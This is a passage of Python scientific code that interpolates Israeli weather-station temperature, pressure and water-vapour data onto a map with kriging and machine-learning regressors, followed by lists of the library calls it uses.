import matplotlib.pyplot as plt
import xarray as xr
from aux_gps import keep_iqr
    bp = xr.load_dataset(path / 'IMS_BP_israeli_10mins.nc')
bps = [keep_iqr(bp[x]) for x in bp]
bp = xr.merge(bps)
mean_p = bp.mean('time').to_array('alt')
mean_p.name = 'mean_pressure'
alts = [bp[x].attrs['station_alt'] for x in bp.data_vars]
mean_p['alt'] = alts
_, results = linear_fit_using_scipy_da_ts(mean_p, model=model, slope_factor=1, not_time=True)
slope = results['slope']
inter = results['intercept']
modeled_var = slope * mean_p['alt'] + inter
if plot:
fig, ax = plt.subplots()
modeled_var.plot(ax=ax, color='r')
mean_p.plot.line(linewidth=0., marker='o', ax=ax, color='b')
# lr = 1000 * abs(slope)
textstr = 'Pressure lapse rate: {:.1f} hPa/km'.format(1000 * slope)
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
# place a text box in upper left in axes coords
ax.text(0.5, 0.95, textstr, transform=ax.transAxes, fontsize=12,
verticalalignment='top', bbox=props)
ax.set_xlabel('Height a.s.l [m]')
ax.set_ylabel('Mean Pressure [hPa]')
return results
def get_var_lapse_rate(hdf, model='LR', plot=False):
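    """Estimate the water-vapor scale height H [m] by fitting log(var) linearly against altitude."""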
from aux_gps import linear_fit_using_scipy_da_ts
import matplotlib.pyplot as plt
import numpy as np
hda = hdf.iloc[:, 0].to_xarray()
dt = hda.name.strftime('%Y-%m-%d %H:%M')
hda.name = ''
log_hda = np.log(hda)
# assume pwv = pwv0*exp(-h/H)
# H is the water vapor scale height
_, results = linear_fit_using_scipy_da_ts(log_hda, model=model, slope_factor=1, not_time=True)
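    # log(pwv) = log(a0) - h/H is linear in altitude, so the fitted slope equals -1/H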
H = -1.0 / results['slope']
a0 = np.exp(results['intercept'])
modeled_var = a0 * np.exp(-hda['alt'] / H)
if plot:
fig, ax = plt.subplots()
modeled_var.plot(ax=ax, color='r')
hda.plot.line(linewidth=0., marker='o', ax=ax, color='b')
# lr = 1000 * abs(slope)
ax.set_title(dt)
textstr = 'WV scale height: {:.1f} m'.format(H)
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
# place a text box in upper left in axes coords
ax.text(0.5, 0.95, textstr, transform=ax.transAxes, fontsize=12,
verticalalignment='top', bbox=props)
ax.set_xlabel('Height a.s.l [m]')
ax.set_ylabel('PWV [mm]')
return H
def apply_lapse_rate_change(hdf, H):
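    """Project station values to a common sea-level reference by multiplying by exp(alt / H)."""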
import numpy as np
# make sure lapse rate is negative:
assert H > 0
new_hdf = hdf.copy()
new_hdf.iloc[:, 0] = hdf.iloc[:, 0] * np.exp(hdf.index / H)
return new_hdf
def interpolate_at_one_dt(new_hdf, H, predict_df=None, dem_path=awd_path,
ppd=50):
    """Interpolate the values in new_hdf (lapse rate already removed) onto the Israel grid,
    with ppd being the map resolution. If predict_df is not None, interpolate only to its
    locations and altitudes; predict_df should have lat, lon and alt columns."""
    from aux_gps import coarse_dem
    import numpy as np
    from pykrige.rk import Krige
# create mesh and load DEM:
da = create_lat_lon_mesh(points_per_degree=ppd) # 500?
# populate the empty mesh grid with stations data:
for i, row in new_hdf.iterrows():
lat = da.sel(lat=row['lat'], method='nearest').lat.values
lon = da.sel(lon=row['lon'], method='nearest').lon.values
da.loc[{'lat': lat, 'lon': lon}] = row.iloc[0]
c = np.linspace(min(da.lat.values), max(da.lat.values), da.shape[0])
r = np.linspace(min(da.lon.values), max(da.lon.values), da.shape[1])
rr, cc = np.meshgrid(r, c)
vals = ~np.isnan(da.values)
X = np.column_stack([rr[vals], cc[vals]])
rr_cc_as_cols = np.column_stack([rr.flatten(), cc.flatten()])
# y = da_scaled.values[vals]
y = da.values[vals]
model = Krige(method='ordinary', variogram_model='spherical',
verbose=True)
model.fit(X, y)
if predict_df is None:
# i.e., interpolate to all map coords:
interpolated = model.predict(rr_cc_as_cols).reshape(da.values.shape)
da_inter = da.copy(data=interpolated)
awd = coarse_dem(da, dem_path=dem_path)
assert H > 0
da_inter *= np.exp(-1.0 * awd / H)
return da_inter
else:
        predict_lats = np.linspace(predict_df.lat.min(), predict_df.lat.max(),
                                    predict_df.lat.values.shape[0])
        predict_lons = np.linspace(predict_df.lon.min(), predict_df.lon.max(),
                                    predict_df.lon.values.shape[0])
predict_lons_lats_as_cols = np.column_stack(
[predict_lons, predict_lats])
interpolated = model.predict(
predict_lons_lats_as_cols).reshape((predict_lats.shape))
df_inter = predict_df.copy()
df_inter['interpolated'] = interpolated
# fix for lapse rate:
assert H > 0
df_inter['interpolated_lr_fixed'] = df_inter['interpolated'] * np.exp(-1.0 * df_inter['alt'] / H)
return df_inter
def create_lat_lon_mesh(lats=[29.5, 33.5], lons=[34, 36],
points_per_degree=1000):
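    """Create an empty (NaN-filled) lat/lon DataArray mesh over the given bounds and resolution."""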
import xarray as xr
import numpy as np
lat = np.arange(lats[0], lats[1], 1.0 / points_per_degree)
lon = np.arange(lons[0], lons[1], 1.0 / points_per_degree)
nans = np.nan * np.ones((len(lat), len(lon)))
da = xr.DataArray(nans, dims=['lat', 'lon'])
da['lat'] = lat
da['lon'] = lon
return da
def Interpolating_models_ims(time='2013-10-19T22:00:00', var='TD', plot=True,
gis_path=gis_path, method='okrig',
dem_path=work_yuval / 'AW3D30', lapse_rate=5.,
cv=None, rms=None, gridsearch=False):
"""main 2d_interpolation from stations to map"""
# cv usage is {'kfold': 5} or {'rkfold': [2, 3]}
# TODO: try 1d modeling first, like T=f(lat)
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.neighbors import KNeighborsRegressor
from pykrige.rk import Krige
import numpy as np
from sklearn.svm import SVR
from sklearn.linear_model import LinearRegression
from sklearn.ensemble import RandomForestRegressor
from scipy.spatial import Delaunay
from scipy.interpolate import griddata
from sklearn.metrics import mean_squared_error
from aux_gps import coarse_dem
import seaborn as sns
import matplotlib.pyplot as plt
import pyproj
from sklearn.utils.estimator_checks import check_estimator
from pykrige.compat import GridSearchCV
lla = pyproj.Proj(proj='latlong', ellps='WGS84', datum='WGS84')
ecef = pyproj.Proj(proj='geocent', ellps='WGS84', datum='WGS84')
def parse_cv(cv):
from sklearn.model_selection import KFold
from sklearn.model_selection import RepeatedKFold
from sklearn.model_selection import LeaveOneOut
"""input:cv number or string"""
# check for integer:
if 'kfold' in cv.keys():
n_splits = cv['kfold']
print('CV is KFold with n_splits={}'.format(n_splits))
return KFold(n_splits=n_splits)
if 'rkfold' in cv.keys():
n_splits = cv['rkfold'][0]
n_repeats = cv['rkfold'][1]
            print('CV is RepeatedKFold with n_splits={},'.format(n_splits) +
' n_repeates={}'.format(n_repeats))
return RepeatedKFold(n_splits=n_splits, n_repeats=n_repeats,
random_state=42)
if 'loo' in cv.keys():
return LeaveOneOut()
# from aux_gps import scale_xr
da = create_lat_lon_mesh(points_per_degree=250) # 500?
awd = coarse_dem(da)
awd = awd.values
geo_snap = geo_pandas_time_snapshot(var=var, datetime=time, plot=False)
if var == 'TD':
[a, b] = np.polyfit(geo_snap['alt'].values, geo_snap['TD'].values, 1)
if lapse_rate == 'auto':
lapse_rate = np.abs(a) * 1000
fig, ax_lapse = plt.subplots(figsize=(10, 6))
sns.regplot(data=geo_snap, x='alt', y='TD', color='r',
scatter_kws={'color': 'b'}, ax=ax_lapse)
suptitle = time.replace('T', ' ')
ax_lapse.set_xlabel('Altitude [m]')
ax_lapse.set_ylabel('Temperature [degC]')
ax_lapse.text(0.5, 0.95, 'Lapse_rate: {:.2f} degC/km'.format(lapse_rate),
horizontalalignment='center', verticalalignment='center',
transform=ax_lapse.transAxes, fontsize=12, color='k',
fontweight='bold')
ax_lapse.grid()
ax_lapse.set_title(suptitle, fontsize=14, fontweight='bold')
# fig.suptitle(suptitle, fontsize=14, fontweight='bold')
alts = []
for i, row in geo_snap.iterrows():
lat = da.sel(lat=row['lat'], method='nearest').lat.values
lon = da.sel(lon=row['lon'], method='nearest').lon.values
alt = row['alt']
if lapse_rate is not None and var == 'TD':
da.loc[{'lat': lat, 'lon': lon}] = row[var] + \
lapse_rate * alt / 1000.0
alts.append(alt)
elif lapse_rate is None or var != 'TD':
da.loc[{'lat': lat, 'lon': lon}] = row[var]
alts.append(alt)
# da_scaled = scale_xr(da)
c = np.linspace(min(da.lat.values), max(da.lat.values), da.shape[0])
r = np.linspace(min(da.lon.values), max(da.lon.values), da.shape[1])
rr, cc = np.meshgrid(r, c)
vals = ~np.isnan(da.values)
if lapse_rate is None:
Xrr, Ycc, Z = pyproj.transform(
lla, ecef, rr[vals], cc[vals], np.array(alts), radians=False)
X = np.column_stack([Xrr, Ycc, Z])
        XX, YY, ZZ = pyproj.transform(lla, ecef, rr, cc, awd,  # awd already holds the DEM values array
radians=False)
rr_cc_as_cols = np.column_stack([XX.flatten(), YY.flatten(), ZZ.flatten()])
else:
X = np.column_stack([rr[vals], cc[vals]])
rr_cc_as_cols = np.column_stack([rr.flatten(), cc.flatten()])
# y = da_scaled.values[vals]
y = da.values[vals]
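    # build the interpolation model selected by `method`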
if method == 'gp-rbf':
from sklearn.gaussian_process.kernels import RBF
from sklearn.gaussian_process.kernels import WhiteKernel
kernel = 1.0 * RBF(length_scale=0.25, length_scale_bounds=(1e-2, 1e3)) \
+ WhiteKernel(noise_level=0.01, noise_level_bounds=(1e-10, 1e+1))
# kernel = None
model = GaussianProcessRegressor(alpha=0.0, kernel=kernel,
n_restarts_optimizer=5,
random_state=42, normalize_y=True)
elif method == 'gp-qr':
from sklearn.gaussian_process.kernels import RationalQuadratic
from sklearn.gaussian_process.kernels import WhiteKernel
kernel = RationalQuadratic(length_scale=100.0) \
+ WhiteKernel(noise_level=0.01, noise_level_bounds=(1e-10, 1e+1))
model = GaussianProcessRegressor(alpha=0.0, kernel=kernel,
n_restarts_optimizer=5,
random_state=42, normalize_y=True)
elif method == 'knn':
model = KNeighborsRegressor(n_neighbors=5, weights='distance')
elif method == 'svr':
model = SVR(C=1.0, cache_size=200, coef0=0.0, degree=3, epsilon=0.1,
gamma='auto_deprecated', kernel='rbf', max_iter=-1,
shrinking=True, tol=0.001, verbose=False)
elif method == 'okrig':
model = Krige(method='ordinary', variogram_model='spherical',
verbose=True)
elif method == 'ukrig':
model = Krige(method='universal', variogram_model='linear',
verbose=True)
# elif method == 'okrig3d':
# # don't bother - MemoryError...
# model = OrdinaryKriging3D(rr[vals], cc[vals], np.array(alts),
# da.values[vals], variogram_model='linear',
# verbose=True)
# awd = coarse_dem(da)
# interpolated, ss = model.execute('grid', r, c, awd['data'].values)
# elif method == 'rkrig':
# # est = LinearRegression()
# est = RandomForestRegressor()
# model = RegressionKriging(regression_model=est, n_closest_points=5,
# verbose=True)
# p = np.array(alts).reshape(-1, 1)
# model.fit(p, X, y)
# P = awd.flatten().reshape(-1, 1)
# interpolated = model.predict(P, rr_cc_as_cols).reshape(da.values.shape)
# try:
# u = check_estimator(model)
# except TypeError:
# u = False
# pass
    if cv is not None and not gridsearch:  # and u is None
# from sklearn.model_selection import cross_validate
from sklearn import metrics
cv = parse_cv(cv)
ytests = []
ypreds = []
for train_idx, test_idx in cv.split(X):
X_train, X_test = X[train_idx], X[test_idx] # requires arrays
y_train, y_test = y[train_idx], y[test_idx]
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
# there is only one y-test and y-pred per iteration over the loo.split,
# so to get a proper graph, we append them to respective lists.
ytests += list(y_test)
ypreds += list(y_pred)
true_vals = np.array(ytests)
predicted = np.array(ypreds)
r2 = metrics.r2_score(ytests, ypreds)
ms_error = metrics.mean_squared_error(ytests, ypreds)
print("R^2: {:.5f}%, MSE: {:.5f}".format(r2*100, ms_error))
if gridsearch:
cv = parse_cv(cv)
param_dict = {"method": ["ordinary", "universal"],
"variogram_model": ["linear", "power", "gaussian",
"spherical"],
# "nlags": [4, 6, 8],
# "weight": [True, False]
}
estimator = GridSearchCV(Krige(), param_dict, verbose=True, cv=cv,
scoring='neg_mean_absolute_error',
return_train_score=True, n_jobs=1)
estimator.fit(X, y)
if hasattr(estimator, 'best_score_'):
print('best_score = {:.3f}'.format(estimator.best_score_))
print('best_params = ', estimator.best_params_)
return estimator
# if (cv is not None and not u):
# from sklearn import metrics
# cv = parse_cv(cv)
# ytests = []
# ypreds = []
# for train_idx, test_idx in cv.split(X):
# X_train, X_test = X[train_idx], X[test_idx] # requires arrays
# y_train, y_test = y[train_idx], y[test_idx]
## model = UniversalKriging(X_train[:, 0], X_train[:, 1], y_train,
## variogram_model='linear', verbose=False,
## enable_plotting=False)
# model.X_ORIG = X_train[:, 0]
# model.X_ADJUSTED = model.X_ORIG
# model.Y_ORIG = X_train[:, 1]
# model.Y_ADJUSTED = model.Y_ORIG
# model.Z = y_train
# y_pred, ss = model.execute('points', X_test[0, 0],
# X_test[0, 1])
# # there is only one y-test and y-pred per iteration over the loo.split,
# # so to get a proper graph, we append them to respective lists.
    #        ytests += list(y_test)
# ypreds += list(y_pred)
# true_vals = np.array(ytests)
# predicted = np.array(ypreds)
# r2 = metrics.r2_score(ytests, ypreds)
# ms_error = metrics.mean_squared_error(ytests, ypreds)
# print("R^2: {:.5f}%, MSE: {:.5f}".format(r2*100, ms_error))
# cv_results = cross_validate(gp, X, y, cv=cv, scoring='mean_squared_error',
# return_train_score=True, n_jobs=-1)
# test = xr.DataArray(cv_results['test_score'], dims=['kfold'])
# train = xr.DataArray(cv_results['train_score'], dims=['kfold'])
# train.name = 'train'
# cds = test.to_dataset(name='test')
# cds['train'] = train
# cds['kfold'] = np.arange(len(cv_results['test_score'])) + 1
# cds['mean_train'] = cds.train.mean('kfold')
# cds['mean_test'] = cds.test.mean('kfold')
# interpolated=griddata(X, y, (rr, cc), method='nearest')
model.fit(X, y)
interpolated = model.predict(rr_cc_as_cols).reshape(da.values.shape)
da_inter = da.copy(data=interpolated)
if lapse_rate is not None and var == 'TD':
da_inter -= lapse_rate * awd / 1000.0
if (rms is not None and cv is None): # or (rms is not None and not u):
predicted = []
true_vals = []
for i, row in geo_snap.iterrows():
lat = da.sel(lat=row['lat'], method='nearest').lat.values
lon = da.sel(lon=row['lon'], method='nearest').lon.values
pred = da_inter.loc[{'lat': lat, 'lon': lon}].values.item()
true = row[var]
predicted.append(pred)
true_vals.append(true)
predicted = np.array(predicted)
true_vals = np.array(true_vals)
ms_error = mean_squared_error(true_vals, predicted)
print("MSE: {:.5f}".format(ms_error))
if plot:
import salem
from salem import DataLevels, Map
import cartopy.crs as ccrs
# import cartopy.io.shapereader as shpreader
import matplotlib.pyplot as plt
# fname = gis_path / 'ne_10m_admin_0_sovereignty.shp'
# fname = gis_path / 'gadm36_ISR_0.shp'
# ax = plt.axes(projection=ccrs.PlateCarree())
f, ax = plt.subplots(figsize=(6, 10))
# shdf = salem.read_shapefile(salem.get_demo_file('world_borders.shp'))
shdf = salem.read_shapefile(gis_path / 'Israel_and_Yosh.shp')
# shdf = shdf.loc[shdf['CNTRY_NAME'] == 'Israel'] # remove other countries
shdf.crs = {'init': 'epsg:4326'}
dsr = da_inter.salem.roi(shape=shdf)
grid = dsr.salem.grid
grid = da_inter.salem.grid
sm = Map(grid)
# sm.set_shapefile(gis_path / 'Israel_and_Yosh.shp')
# sm = dsr.salem.quick_map(ax=ax)
# sm2 = salem.Map(grid, factor=1)
# sm2.set_shapefile(gis_path/'gis_osm_water_a_free_1.shp',
# edgecolor='k')
sm.set_data(dsr)
# sm.set_nlevels(7)
# sm.visualize(ax=ax, title='Israel {} interpolated temperature from IMS'.format(method),
# cbar_title='degC')
sm.set_shapefile(gis_path/'gis_osm_water_a_free_1.shp',
edgecolor='k') # , facecolor='aqua')
# sm.set_topography(awd.values, crs=awd.crs)
# sm.set_rgb(crs=shdf.crs, natural_earth='hr') # ad
# lakes = salem.read_shapefile(gis_path/'gis_osm_water_a_free_1.shp')
sm.set_cmap(cm='rainbow')
sm.visualize(ax=ax, title='Israel {} interpolated temperature from IMS'.format(method),
cbar_title='degC')
dl = DataLevels(geo_snap[var], levels=sm.levels)
dl.set_cmap(sm.cmap)
x, y = sm.grid.transform(geo_snap.lon.values, geo_snap.lat.values)
ax.scatter(x, y, color=dl.to_rgb(), s=20, edgecolors='k', linewidths=0.5)
suptitle = time.replace('T', ' ')
f.suptitle(suptitle, fontsize=14, fontweight='bold')
if (rms is not None or cv is not None) and (not gridsearch):
import seaborn as sns
f, ax = plt.subplots(1, 2, figsize=(12, 6))
sns.scatterplot(x=true_vals, y=predicted, ax=ax[0], marker='.',
s=100)
resid = predicted - true_vals
sns.distplot(resid, bins=5, color='c', label='residuals',
ax=ax[1])
rmean = np.mean(resid)
rstd = np.std(resid)
rmedian = np.median(resid)
rmse = np.sqrt(mean_squared_error(true_vals, predicted))
plt.axvline(rmean, color='r', linestyle='dashed', linewidth=1)
_, max_ = plt.ylim()
plt.text(rmean + rmean / 10, max_ - max_ / 10,
'Mean: {:.2f}, RMSE: {:.2f}'.format(rmean, rmse))
f.tight_layout()
# lakes.plot(ax=ax, color='b', edgecolor='k')
# lake_borders = gpd.overlay(countries, capitals, how='difference')
# adm1_shapes = list(shpreader.Reader(fname).geometries())
# ax = plt.axes(projection=ccrs.PlateCarree())
# ax.coastlines(resolution='10m')
# ax.add_geometries(adm1_shapes, ccrs.PlateCarree(),
# edgecolor='black', facecolor='gray', alpha=0.5)
# da_inter.plot.pcolormesh('lon', 'lat', ax=ax)
#geo_snap.plot(ax=ax, column=var, cmap='viridis', edgecolor='black',
# legend=False)
return da_inter
|
[
"numpy.abs",
"numpy.polyfit",
"sklearn.metrics.r2_score",
"numpy.isnan",
"seaborn.regplot",
"numpy.mean",
"numpy.arange",
"numpy.exp",
"aux_gps.coarse_dem",
"salem.read_shapefile",
"sklearn.model_selection.RepeatedKFold",
"pandas.DataFrame",
"matplotlib.pyplot.axvline",
"numpy.meshgrid",
"numpy.std",
"xarray.merge",
"matplotlib.pyplot.subplots",
"sklearn.gaussian_process.GaussianProcessRegressor",
"sklearn.metrics.mean_squared_error",
"salem.Map",
"aux_gps.keep_iqr",
"seaborn.scatterplot",
"numpy.median",
"matplotlib.pyplot.ylim",
"sklearn.gaussian_process.kernels.RBF",
"sklearn.gaussian_process.kernels.RationalQuadratic",
"pandas.to_datetime",
"aux_gps.linear_fit_using_scipy_da_ts",
"sklearn.gaussian_process.kernels.WhiteKernel",
"sklearn.svm.SVR",
"sklearn.neighbors.KNeighborsRegressor",
"numpy.log",
"sklearn.model_selection.KFold",
"sklearn.model_selection.LeaveOneOut",
"pykrige.rk.Krige",
"pyproj.Proj",
"xarray.DataArray",
"numpy.array",
"numpy.column_stack",
"seaborn.distplot",
"salem.DataLevels",
"pyproj.transform",
"xarray.load_dataset"
] |
[((515, 529), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (527, 529), True, 'import pandas as pd\n'), ((1408, 1438), 'pandas.to_datetime', 'pd.to_datetime', (["df['datetime']"], {}), "(df['datetime'])\n", (1422, 1438), True, 'import pandas as pd\n'), ((2602, 2656), 'xarray.load_dataset', 'xr.load_dataset', (["(ims_path / 'IMS_BP_israeli_10mins.nc')"], {}), "(ims_path / 'IMS_BP_israeli_10mins.nc')\n", (2617, 2656), True, 'import xarray as xr\n'), ((2706, 2719), 'xarray.merge', 'xr.merge', (['bps'], {}), '(bps)\n', (2714, 2719), True, 'import xarray as xr\n'), ((2903, 2988), 'aux_gps.linear_fit_using_scipy_da_ts', 'linear_fit_using_scipy_da_ts', (['mean_p'], {'model': 'model', 'slope_factor': '(1)', 'not_time': '(True)'}), '(mean_p, model=model, slope_factor=1, not_time=True\n )\n', (2931, 2988), False, 'from aux_gps import linear_fit_using_scipy_da_ts\n'), ((3999, 4010), 'numpy.log', 'np.log', (['hda'], {}), '(hda)\n', (4005, 4010), True, 'import numpy as np\n'), ((4102, 4188), 'aux_gps.linear_fit_using_scipy_da_ts', 'linear_fit_using_scipy_da_ts', (['log_hda'], {'model': 'model', 'slope_factor': '(1)', 'not_time': '(True)'}), '(log_hda, model=model, slope_factor=1, not_time\n =True)\n', (4130, 4188), False, 'from aux_gps import linear_fit_using_scipy_da_ts\n'), ((4225, 4253), 'numpy.exp', 'np.exp', (["results['intercept']"], {}), "(results['intercept'])\n", (4231, 4253), True, 'import numpy as np\n'), ((6132, 6149), 'numpy.meshgrid', 'np.meshgrid', (['r', 'c'], {}), '(r, c)\n', (6143, 6149), True, 'import numpy as np\n'), ((6190, 6227), 'numpy.column_stack', 'np.column_stack', (['[rr[vals], cc[vals]]'], {}), '([rr[vals], cc[vals]])\n', (6205, 6227), True, 'import numpy as np\n'), ((6363, 6430), 'pykrige.rk.Krige', 'Krige', ([], {'method': '"""ordinary"""', 'variogram_model': '"""spherical"""', 'verbose': '(True)'}), "(method='ordinary', variogram_model='spherical', verbose=True)\n", (6368, 6430), False, 'from pykrige.rk import Krige\n'), ((7682, 7734), 'numpy.arange', 'np.arange', (['lats[0]', 'lats[1]', '(1.0 / points_per_degree)'], {}), '(lats[0], lats[1], 1.0 / points_per_degree)\n', (7691, 7734), True, 'import numpy as np\n'), ((7745, 7797), 'numpy.arange', 'np.arange', (['lons[0]', 'lons[1]', '(1.0 / points_per_degree)'], {}), '(lons[0], lons[1], 1.0 / points_per_degree)\n', (7754, 7797), True, 'import numpy as np\n'), ((7857, 7896), 'xarray.DataArray', 'xr.DataArray', (['nans'], {'dims': "['lat', 'lon']"}), "(nans, dims=['lat', 'lon'])\n", (7869, 7896), True, 'import xarray as xr\n'), ((9074, 9131), 'pyproj.Proj', 'pyproj.Proj', ([], {'proj': '"""latlong"""', 'ellps': '"""WGS84"""', 'datum': '"""WGS84"""'}), "(proj='latlong', ellps='WGS84', datum='WGS84')\n", (9085, 9131), False, 'import pyproj\n'), ((9143, 9200), 'pyproj.Proj', 'pyproj.Proj', ([], {'proj': '"""geocent"""', 'ellps': '"""WGS84"""', 'datum': '"""WGS84"""'}), "(proj='geocent', ellps='WGS84', datum='WGS84')\n", (9154, 9200), False, 'import pyproj\n'), ((10172, 10186), 'aux_gps.coarse_dem', 'coarse_dem', (['da'], {}), '(da)\n', (10182, 10186), False, 'from aux_gps import coarse_dem\n'), ((11919, 11936), 'numpy.meshgrid', 'np.meshgrid', (['r', 'c'], {}), '(r, c)\n', (11930, 11936), True, 'import numpy as np\n'), ((2668, 2683), 'aux_gps.keep_iqr', 'keep_iqr', (['bp[x]'], {}), '(bp[x])\n', (2676, 2683), False, 'from aux_gps import keep_iqr\n'), ((3125, 3139), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3137, 3139), True, 'import matplotlib.pyplot as plt\n'), ((4277, 4300), 'numpy.exp', 
'np.exp', (["(-hda['alt'] / H)"], {}), "(-hda['alt'] / H)\n", (4283, 4300), True, 'import numpy as np\n'), ((4332, 4346), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (4344, 4346), True, 'import matplotlib.pyplot as plt\n'), ((5096, 5117), 'numpy.exp', 'np.exp', (['(hdf.index / H)'], {}), '(hdf.index / H)\n', (5102, 5117), True, 'import numpy as np\n'), ((6162, 6181), 'numpy.isnan', 'np.isnan', (['da.values'], {}), '(da.values)\n', (6170, 6181), True, 'import numpy as np\n'), ((6680, 6713), 'aux_gps.coarse_dem', 'coarse_dem', (['da'], {'dem_path': 'dem_path'}), '(da, dem_path=dem_path)\n', (6690, 6713), False, 'from aux_gps import coarse_dem\n'), ((6755, 6777), 'numpy.exp', 'np.exp', (['(-1.0 * awd / H)'], {}), '(-1.0 * awd / H)\n', (6761, 6777), True, 'import numpy as np\n'), ((7088, 7133), 'numpy.column_stack', 'np.column_stack', (['[predict_lons, predict_lats]'], {}), '([predict_lons, predict_lats])\n', (7103, 7133), True, 'import numpy as np\n'), ((10321, 10381), 'numpy.polyfit', 'np.polyfit', (["geo_snap['alt'].values", "geo_snap['TD'].values", '(1)'], {}), "(geo_snap['alt'].values, geo_snap['TD'].values, 1)\n", (10331, 10381), True, 'import numpy as np\n'), ((10481, 10510), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(10, 6)'}), '(figsize=(10, 6))\n', (10493, 10510), True, 'import matplotlib.pyplot as plt\n'), ((10519, 10618), 'seaborn.regplot', 'sns.regplot', ([], {'data': 'geo_snap', 'x': '"""alt"""', 'y': '"""TD"""', 'color': '"""r"""', 'scatter_kws': "{'color': 'b'}", 'ax': 'ax_lapse'}), "(data=geo_snap, x='alt', y='TD', color='r', scatter_kws={'color':\n 'b'}, ax=ax_lapse)\n", (10530, 10618), True, 'import seaborn as sns\n'), ((11949, 11968), 'numpy.isnan', 'np.isnan', (['da.values'], {}), '(da.values)\n', (11957, 11968), True, 'import numpy as np\n'), ((12126, 12156), 'numpy.column_stack', 'np.column_stack', (['[Xrr, Ycc, Z]'], {}), '([Xrr, Ycc, Z])\n', (12141, 12156), True, 'import numpy as np\n'), ((12178, 12240), 'pyproj.transform', 'pyproj.transform', (['lla', 'ecef', 'rr', 'cc', 'awd.values'], {'radians': '(False)'}), '(lla, ecef, rr, cc, awd.values, radians=False)\n', (12194, 12240), False, 'import pyproj\n'), ((12385, 12422), 'numpy.column_stack', 'np.column_stack', (['[rr[vals], cc[vals]]'], {}), '([rr[vals], cc[vals]])\n', (12400, 12422), True, 'import numpy as np\n'), ((12897, 13010), 'sklearn.gaussian_process.GaussianProcessRegressor', 'GaussianProcessRegressor', ([], {'alpha': '(0.0)', 'kernel': 'kernel', 'n_restarts_optimizer': '(5)', 'random_state': '(42)', 'normalize_y': '(True)'}), '(alpha=0.0, kernel=kernel, n_restarts_optimizer=5,\n random_state=42, normalize_y=True)\n', (12921, 13010), False, 'from sklearn.gaussian_process import GaussianProcessRegressor\n'), ((15835, 15851), 'numpy.array', 'np.array', (['ytests'], {}), '(ytests)\n', (15843, 15851), True, 'import numpy as np\n'), ((15872, 15888), 'numpy.array', 'np.array', (['ypreds'], {}), '(ypreds)\n', (15880, 15888), True, 'import numpy as np\n'), ((15902, 15934), 'sklearn.metrics.r2_score', 'metrics.r2_score', (['ytests', 'ypreds'], {}), '(ytests, ypreds)\n', (15918, 15934), False, 'from sklearn import metrics\n'), ((15954, 15996), 'sklearn.metrics.mean_squared_error', 'metrics.mean_squared_error', (['ytests', 'ypreds'], {}), '(ytests, ypreds)\n', (15980, 15996), False, 'from sklearn import metrics\n'), ((19777, 19796), 'numpy.array', 'np.array', (['predicted'], {}), '(predicted)\n', (19785, 19796), True, 'import numpy as np\n'), ((19817, 19836), 'numpy.array', 
'np.array', (['true_vals'], {}), '(true_vals)\n', (19825, 19836), True, 'import numpy as np\n'), ((19856, 19896), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (['true_vals', 'predicted'], {}), '(true_vals, predicted)\n', (19874, 19896), False, 'from sklearn.metrics import mean_squared_error\n'), ((20328, 20357), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(6, 10)'}), '(figsize=(6, 10))\n', (20340, 20357), True, 'import matplotlib.pyplot as plt\n'), ((20453, 20507), 'salem.read_shapefile', 'salem.read_shapefile', (["(gis_path / 'Israel_and_Yosh.shp')"], {}), "(gis_path / 'Israel_and_Yosh.shp')\n", (20473, 20507), False, 'import salem\n'), ((20756, 20765), 'salem.Map', 'Map', (['grid'], {}), '(grid)\n', (20759, 20765), False, 'from salem import DataLevels, Map\n'), ((21712, 21755), 'salem.DataLevels', 'DataLevels', (['geo_snap[var]'], {'levels': 'sm.levels'}), '(geo_snap[var], levels=sm.levels)\n', (21722, 21755), False, 'from salem import DataLevels, Map\n'), ((7461, 7495), 'numpy.exp', 'np.exp', (["(-1.0 * df_inter['alt'] / H)"], {}), "(-1.0 * df_inter['alt'] / H)\n", (7467, 7495), True, 'import numpy as np\n'), ((9611, 9635), 'sklearn.model_selection.KFold', 'KFold', ([], {'n_splits': 'n_splits'}), '(n_splits=n_splits)\n', (9616, 9635), False, 'from sklearn.model_selection import KFold\n'), ((9899, 9969), 'sklearn.model_selection.RepeatedKFold', 'RepeatedKFold', ([], {'n_splits': 'n_splits', 'n_repeats': 'n_repeats', 'random_state': '(42)'}), '(n_splits=n_splits, n_repeats=n_repeats, random_state=42)\n', (9912, 9969), False, 'from sklearn.model_selection import RepeatedKFold\n'), ((10053, 10066), 'sklearn.model_selection.LeaveOneOut', 'LeaveOneOut', ([], {}), '()\n', (10064, 10066), False, 'from sklearn.model_selection import LeaveOneOut\n'), ((12083, 12097), 'numpy.array', 'np.array', (['alts'], {}), '(alts)\n', (12091, 12097), True, 'import numpy as np\n'), ((12794, 12857), 'sklearn.gaussian_process.kernels.WhiteKernel', 'WhiteKernel', ([], {'noise_level': '(0.01)', 'noise_level_bounds': '(1e-10, 10.0)'}), '(noise_level=0.01, noise_level_bounds=(1e-10, 10.0))\n', (12805, 12857), False, 'from sklearn.gaussian_process.kernels import WhiteKernel\n'), ((13405, 13518), 'sklearn.gaussian_process.GaussianProcessRegressor', 'GaussianProcessRegressor', ([], {'alpha': '(0.0)', 'kernel': 'kernel', 'n_restarts_optimizer': '(5)', 'random_state': '(42)', 'normalize_y': '(True)'}), '(alpha=0.0, kernel=kernel, n_restarts_optimizer=5,\n random_state=42, normalize_y=True)\n', (13429, 13518), False, 'from sklearn.gaussian_process import GaussianProcessRegressor\n'), ((16447, 16454), 'pykrige.rk.Krige', 'Krige', ([], {}), '()\n', (16452, 16454), False, 'from pykrige.rk import Krige\n'), ((22168, 22203), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {'figsize': '(12, 6)'}), '(1, 2, figsize=(12, 6))\n', (22180, 22203), True, 'import matplotlib.pyplot as plt\n'), ((22216, 22286), 'seaborn.scatterplot', 'sns.scatterplot', ([], {'x': 'true_vals', 'y': 'predicted', 'ax': 'ax[0]', 'marker': '"""."""', 's': '(100)'}), 